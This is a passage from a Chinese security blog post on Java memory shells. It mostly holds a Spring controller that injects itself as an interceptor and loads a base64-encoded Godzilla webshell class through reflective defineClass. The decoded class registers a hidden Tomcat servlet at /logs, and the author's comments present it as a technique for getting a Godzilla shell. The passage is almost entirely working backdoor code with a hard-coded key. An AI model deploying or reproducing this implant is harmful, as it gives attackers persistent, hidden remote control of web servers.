MAaAAAABYABQAAAFMABgBUACMAVQApAFYAKgBXAGkAAAA0AAUABgAjAIUAhgADACoAAgB6AHsAAwAAACwAagBrAAAAAAAsAG8AfQABAAAALABtAIcAAgBxAAAAPAAD/wAPAAQHAIgHAB8BBwCJAAEHAIn/AAAABAcAiAcAHwEHAIkAAgcAiQH/ABgAAwcAiAcAHwEAAQcAcwB0AAAACQIAbwAAAG0AAAABAIoAiwADAGcAAACoAAYABAAAAFS7AC9ZA70AMLgAMbYAMrcAM00SNBI1Br0AHlkDEh9TWQSyADZTWQWyADZTtgA3Ti0EtgA4LSwGvQAgWQMrU1kEA7gAOVNZBSu+uAA5U7YAG8AAHrAAAAACAGgAAAASAAQAAABcABIAXQAvAF4ANABfAGkAAAAqAAQAAABUAGoAawAAAAAAVACMAH0AAQASAEIAjQCOAAIALwAlAI8AkAADAH8AAAAEAAEASQB0AAAABQEAjAAAAAQAkQCSAAMAZwAAAUwABAAGAAAAlisqtAAFuQA6AgC4ADtOKi0DtgA8Tiq0AD3HAA8qKi22AD61AD2nAGy7AD9ZtwBAOgQqtAA9tgAjOgUZBRkEtgBBVxkFLbYAQVcZBSu2AEFXLLkAQgEAKrQACwMQELYAQ7YARBkFtgBFVyy5AEIBACoZBLYARgS2ADy4AEe2AEQsuQBCAQAqtAALEBC2AEi2AESnAAROsQABAAAAkQCUAEkAAwBoAAAAQgAQAAAAZQAOAGYAFQBnABwAaAAoAGoAMQBrADoAbABCAG0ASQBuAFAAbwBjAHAAaQBxAH8AcgCRAHUAlAB0AJUAdgBpAAAAPgAGADEAYACTAJQABAA6AFcAlQB4AAUADgCDAJYAfQADAAAAlgBqAGsAAAAAAJYAlwCYAAEAAACWAJkAmgACAHEAAAAQAAT8ACgHAB/6AGhCBwCbAAB/AAAABgACAJwAnQB0AAAACQIAlwAAAJkAAAAIAJ4AZgABAGcAAADaAAMABAAAAGISSrMASxJMswBNuwBOWbcAT0u4ADG2ADLAAFBMK7YAUbkAUgEAwABTTSy2AFROLbIATbkAVQIALQS5AFYCAC0quQBXAgAtKrYAHLYAWLkAWQIALC22AFossgBLsgBNtgBbsQAAAAIAaAAAADYADQAAABEABQASAAoAFgASABcAHAAYACkAGQAuABoANwAbAD4AHABFAB0AUgAeAFcAHwBhACAAaQAAACoABAASAE8AnwCgAAAAHABFAKEAogABACkAOACjAKQAAgAuADMApQCmAAMAAQCnAAAAAgCo";
byte[] bytes = Base64.getDecoder().decode(base64Class);
URLClassLoader urlClassLoader = new URLClassLoader(new URL[0], Thread.currentThread().getContextClassLoader());
Method defMethod = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
defMethod.setAccessible(true);
Class invoke = (Class) defMethod.invoke(urlClassLoader, bytes, 0, bytes.length);
invoke.getConstructor().newInstance();
}
}
那拦截器打哥斯拉马按理说应该也可以,虽然说有些多余(qaq
也通了,毕竟有界面比盲打好多了呗,以后内存马思路
如果能define参数可控直接打哥斯拉
templates直接替换加载即可
package com.example.springboot12345.Controller;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RestController;
import org.springframework.web.context.WebApplicationContext;
import org.springframework.web.context.request.RequestContextHolder;
import org.springframework.web.servlet.HandlerInterceptor;
import org.springframework.web.servlet.ModelAndView;
import org.springframework.web.servlet.handler.AbstractHandlerMapping;
import org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.InputStream;
import java.lang.reflect.Field;
import java.lang.reflect.Method;
import java.net.URL;
import java.net.URLClassLoader;
import java.util.Base64;
import java.util.List;
import java.util.Scanner;
@RestController
public class InjectInterceptor implements HandlerInterceptor {
@RequestMapping("/aaa")
public void aaa(){
WebApplicationContext context = (WebApplicationContext) RequestContextHolder.currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT", 0);
RequestMappingHandlerMapping mappingHandlerMapping = context.getBean(RequestMappingHandlerMapping.class);
Field field = null;
try {
field = AbstractHandlerMapping.class.getDeclaredField("adaptedInterceptors");
} catch (NoSuchFieldException e) {
e.printStackTrace();
}
field.setAccessible(true);
List<HandlerInterceptor> adaptInterceptors = null;
try {
adaptInterceptors = (List<HandlerInterceptor>) field.get(mappingHandlerMapping);
} catch (IllegalAccessException e) {
e.printStackTrace();
}
InjectInterceptor evilInterceptor = new InjectInterceptor();
adaptInterceptors.add(evilInterceptor);}
@Override
public boolean preHandle(HttpServletRequest request, HttpServletResponse response, Object handler) throws Exception {
try {
String base64Class = "yv66vgAAADQBWwoAXACpCACqCQBOAKsIAF8JAE4ArAcArQoABgCpCgAGAK4KAAYArwoATgCwCQBOALEIALIKALMAtAoAIQC1CgAhALYKALMAtwcAuAoAswC5CgARALoKABEAuwoAIQC8BwC9CAC+CgAeAL8IAMAKAB4AwQoAwgDDCgAgAMQIAMUHAMYHAH0HAMcHAMgIAMkKAB4AyggAywgAzAgAzQgAzggAzwgA0AoA0QDSBwDTCgArANQKANEA1QoA0QDWBwDXBwDYCgDZANoKANkA2woALwDcBwDdCADeCQDfAOAKAB4A4QoAwgDiCgDfAOMLAOQA5QoATgDmCgBOAOcJAE4A6AoATgDpBwDqCgA/AKkKACAA6wsA7ADtCgAhAO4KAO8A8AoAIACvCgA/APEKAE4A8goAIQDzBwD0CAD1CQBOAPYIAPcJAE4A+AcA+QoATgCpBwD6CgBQAPsLAPwA/QcA/goAUwD/CwEAAQELAQABAgsBAAEDCgAeAQQLAQABBQoAUwEGCgBTAQcHAQgBAAJ4YwEAEkxqYXZhL2xhbmcvU3RyaW5nOwEABHBhc3MBAAdwYXR0ZXJuAQALc2VydmxldE5hbWUBAANtZDUBAAdwYXlsb2FkAQARTGphdmEvbGFuZy9DbGFzczsBAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEANExjb20vZXhhbXBsZS9zcHJpbmdib290MTIzNDUvQ29udHJvbGxlci9Hb2R6aWxsYU1lbTsBACYoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nOwEAAW0BAB1MamF2YS9zZWN1cml0eS9NZXNzYWdlRGlnZXN0OwEAAXMBAANyZXQBAA1TdGFja01hcFRhYmxlBwDIBwC9AQAQTWV0aG9kUGFyYW1ldGVycwEADGJhc2U2NEVuY29kZQEAFihbQilMamF2YS9sYW5nL1N0cmluZzsBAAdFbmNvZGVyAQASTGphdmEvbGFuZy9PYmplY3Q7AQAGYmFzZTY0AQABZQEAFUxqYXZhL2xhbmcvRXhjZXB0aW9uOwEAAmJzAQACW0IBAAV2YWx1ZQEACkV4Y2VwdGlvbnMBAAxiYXNlNjREZWNvZGUBABYoTGphdmEvbGFuZy9TdHJpbmc7KVtCAQAHZGVjb2RlcgEAAXgBAAcoW0JaKVtCAQABYwEAFUxqYXZheC9jcnlwdG8vQ2lwaGVyOwEAAVoHAPkHAQkBAAhkZWZDbGFzcwEAFShbQilMamF2YS9sYW5nL0NsYXNzOwEACmNsYXNzQnl0ZXMBAA51cmxDbGFzc0xvYWRlcgEAGUxqYXZhL25ldC9VUkxDbGFzc0xvYWRlcjsBAAlkZWZNZXRob2QBABpMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwEABmRvUG9zdAEAUihMamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVxdWVzdDtMamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVzcG9uc2U7KVYBAAZhcnJPdXQBAB9MamF2YS9pby9CeXRlQXJyYXlPdXRwdXRTdHJlYW07AQABZgEABGRhdGEBAANyZXEBACdMamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVxdWVzdDsBAARyZXNwAQAoTGphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlc3BvbnNlOwcA9AcBCgcBCwEACDxjbGluaXQ+AQAHc2VydmxldAEAF0xqYXZheC9zZXJ2bGV0L1NlcnZsZXQ7AQAVd2ViYXBwQ2xhc3NMb2FkZXJCYXNlAQAyTG9yZy9hcGFjaGUvY2F0YWxpbmEvbG9hZGVyL1dlYmFwcENsYXNzTG9hZGVyQmFzZTsBAAtzdGFuZGFyZEN0eAEAKkxvcmcvYXBhY2hlL2NhdGFsaW5hL2NvcmUvU3RhbmRhcmRDb250ZXh0OwEACm5ld1dyYXBwZXIBAB1Mb3JnL2FwYWNoZS9jYXRhbGluYS9XcmFwcGVyOwEAClNvdXJjZUZpbGUBABBHb2R6aWxsYU1lbS5qYXZhDABlAGYBABAzYzZlMGI4YTljMTUyMjRhDABdAF4MAF8AXgEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyDAEMAQ0MAQ4BDwwAYgBsDABiAF4BAANNRDUHARAMAREBEgwBEwEUDAEVARYMARcBGAEAFGphdmEvbWF0aC9CaWdJbnRlZ2VyDAEZARQMAGUBGgwBDgEbDAEcAQ8BABNqYXZhL2xhbmcvRXhjZXB0aW9uAQAQamF2YS51dGlsLkJhc2U2NAwBHQEeAQAKZ2V0RW5jb2RlcgwBHwEgBwEhDAEiASMMASQBJQEADmVuY29kZVRvU3RyaW5nAQAPamF2YS9sYW5nL0NsYXNzAQAQamF2YS9sYW5nL09iamVjdAEAEGphdmEvbGFuZy9TdHJpbmcBABZzdW4ubWlzYy5CQVNFNjRFbmNvZGVyDAEmAScBAAZlbmNvZGUBAApnZXREZWNvZGVyAQAGZGVjb2RlAQAWc3VuLm1pc2MuQkFTRTY0RGVjb2RlcgEADGRlY29kZUJ1ZmZlcgEAA0FFUwcBCQwBEQEoAQAfamF2YXgvY3J5cHRvL3NwZWMvU2VjcmV0S2V5U3BlYwwAZQEpDAEqASsMASwBLQEAF2phdmEvbmV0L1VSTENsYXNzTG9hZGVyAQAMamF2YS9uZXQvVVJMBwEuDAEvATAMATEBMgwAZQEzAQAVamF2YS9sYW5nL0NsYXNzTG9hZGVyAQALZGVmaW5lQ2xhc3MHATQMATUAZAwBNgEgDAE3ATgMATkBOgcBOwwBPABsDACAAIEMAIMAhAwAYwBkDACKAIsBAB1qYXZhL2lvL0J5dGVBcnJheU91dHB1dFN0cmVhbQwBPQE+BwE/DAFAAUEMAUIBQwcBRAwBRQFGDAFHARQMAHUAdgwBQgEbAQATamF2YS9sYW5nL1Rocm93YWJsZQEABS9sb2dzDABgAF4BAApKVk1TZXJ2aWNlDABhAF4BADJjb20vZXhhbXBsZS9zcHJpbmdib290MTIzNDUvQ29udHJvbGxlci9Hb2R6aWxsYU1lbQEAMG9yZy9hcGFjaGUvY2F0YWxpbmEvbG9hZGVyL1dlYmFwcENsYXNzTG9hZGVyQmFzZQwBSAFJBwFKDAFLAUwBAChvcmcvYXBhY2hlL2NhdGFsaW5hL2NvcmUvU3RhbmRhcmRDb250ZXh0DAFNAU4HAU8MAVABRgwBUQFSDAFTAVQMAVUBDwwBVgFGDAFXAVgMAVkBWgEAHmphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldAEAE2phdmF4L2NyeXB0by9DaXBoZXIBAB5qYXZheC9zZXJ2bGV0L1NlcnZsZXRFeGNlcHRpb24BABNqYXZhL2lvL0lPRXhjZXB0aW9uAQAGYXBwZW5kAQAtKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZ0J1aWxkZXI7AQAIdG9TdHJpbmcBABQoKUxqYXZhL2xhbmcvU3RyaW5nOwEAG2phdmEvc2VjdXJpdHkvTWVzc2FnZURpZ2VzdAEAC2dldEluc3RhbmNlAQAxKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9zZWN1cml0eS9NZXNzYWdlRGlnZXN0OwEACGdldEJ5dGVzAQAEKClbQgEABmxlbmd0aAEAAygpSQEABnVwZGF0ZQEAByhbQklJKVYBAAZkaWdlc3QBAAYoSVtCKVYBABUoSSlMamF2YS9sYW5nL1N0cmluZzsBAAt0b1VwcGVyQ2FzZQEAB2Zvck5hbWUBACUoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvQ2xhc3M7AQAJZ2V0TWV0aG9kAQBAKExqYXZhL2xhbmcvU3RyaW5nO1tMamF2YS9sYW5nL0NsYXNzOylMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwEAGGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZAEABmludm9rZQEAOShMamF2YS9sYW5nL09iamVjdDtbTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwEACGdldENsYXNzAQATKClMamF2YS9sYW5nL0NsYXNzOwEAC25ld0luc3RhbmNlAQAUKClMamF2YS9sYW5nL09iamVjdDsBACkoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZheC9jcnlwdG8vQ2lwaGVyOwEAFyhbQkxqYXZhL2xhbmcvU3RyaW5nOylWAQAEaW5pdAEAFyhJTGphdmEvc2VjdXJpdHkvS2V5OylWAQAHZG9GaW5hbAEABihbQilbQgEAEGphdmEvbGFuZy9UaHJlYWQBAA1jdXJyZW50VGhyZWFkAQAUKClMamF2YS9sYW5nL1RocmVhZDsBABVnZXRDb250ZXh0Q2xhc3NMb2FkZXIBABkoKUxqYXZhL2xhbmcvQ2xhc3NMb2FkZXI7AQApKFtMamF2YS9uZXQvVVJMO0xqYXZhL2xhbmcvQ2xhc3NMb2FkZXI7KVYBABFqYXZhL2xhbmcvSW50ZWdlcgEABFRZUEUBABFnZXREZWNsYXJlZE1ldGhvZAEADXNldEFjY2Vzc2libGUBAAQoWilWAQAHdmFsdWVPZgEAFihJKUxqYXZhL2xhbmcvSW50ZWdlcjsBACVqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXF1ZXN0AQAMZ2V0UGFyYW1ldGVyAQAGZXF1YWxzAQAVKExqYXZhL2xhbmcvT2JqZWN0OylaAQAmamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVzcG9uc2UBAAlnZXRXcml0ZXIBABcoKUxqYXZhL2lvL1ByaW50V3JpdGVyOwEACXN1YnN0cmluZwEAFihJSSlMamF2YS9sYW5nL1N0cmluZzsBABNqYXZhL2lvL1ByaW50V3JpdGVyAQAFd3JpdGUBABUoTGphdmEvbGFuZy9TdHJpbmc7KVYBAAt0b0J5dGVBcnJheQEADGdldFJlc291cmNlcwEAJygpTG9yZy9hcGFjaGUvY2F0YWxpbmEvV2ViUmVzb3VyY2VSb290OwEAI29yZy9hcGFjaGUvY2F0YWxpbmEvV2ViUmVzb3VyY2VSb290AQAKZ2V0Q29udGV4dAEAHygpTG9yZy9hcGFjaGUvY2F0YWxpbmEvQ29udGV4dDsBAA1jcmVhdGVXcmFwcGVyAQAfKClMb3JnL2FwYWNoZS9jYXRhbGluYS9XcmFwcGVyOwEAG29yZy9hcGFjaGUvY2F0YWxpbmEvV3JhcHBlcgEAB3NldE5hbWUBABBzZXRMb2FkT25TdGFydHVwAQAEKEkpVgEACnNldFNlcnZsZXQBABooTGphdmF4L3NlcnZsZXQvU2VydmxldDspVgEAB2dldE5hbWUBAA9zZXRTZXJ2bGV0Q2xhc3MBAAhhZGRDaGlsZAEAIihMb3JnL2FwYWNoZS9jYXRhbGluYS9Db250YWluZXI7KVYBABhhZGRTZXJ2bGV0TWFwcGluZ0RlY29kZWQBACcoTGphdmEvbGFuZy9TdHJpbmc7TGphdmEvbGFuZy9TdHJpbmc7KVYAIQBOAFwAAAAGAAAAXQBeAAAAAABfAF4AAAAIAGAAXgAAAAgAYQBeAAAAAABiAF4AAAAAAGMAZAAAAAgAAQBlAGYAAQBnAAAAZgADAAEAAAAwKrcAASoSArUAAyoSBLUABSq7AAZZtwAHKrQABbYACCq0AAO2AAi2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";
byte[] bytes = Base64.getDecoder().decode(base64Class);
URLClassLoader urlClassLoader = new URLClassLoader(new URL[0], Thread.currentThread().getContextClassLoader());
Method defMethod = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
defMethod.setAccessible(true);
Class invoke = (Class) defMethod.invoke(urlClassLoader, bytes, 0, bytes.length);
invoke.getConstructor().newInstance();
}catch (Exception e){
return true;
}
return false;
}
@Override
public void postHandle(HttpServletRequest request, HttpServletResponse response, Object handler, ModelAndView modelAndView) throws Exception {
HandlerInterceptor.super.postHandle(request, response, handler, modelAndView);
}
@Override
public void afterCompletion(HttpServletRequest request, HttpServletResponse response, Object handler, Exception ex) throws Exception {
HandlerInterceptor.super.afterCompletion(request, response, handler, ex);
}
}
本作品采用CC BY-NC-ND 4.0进行许可。转载,请注明原作者 Azeril 及本文源链接。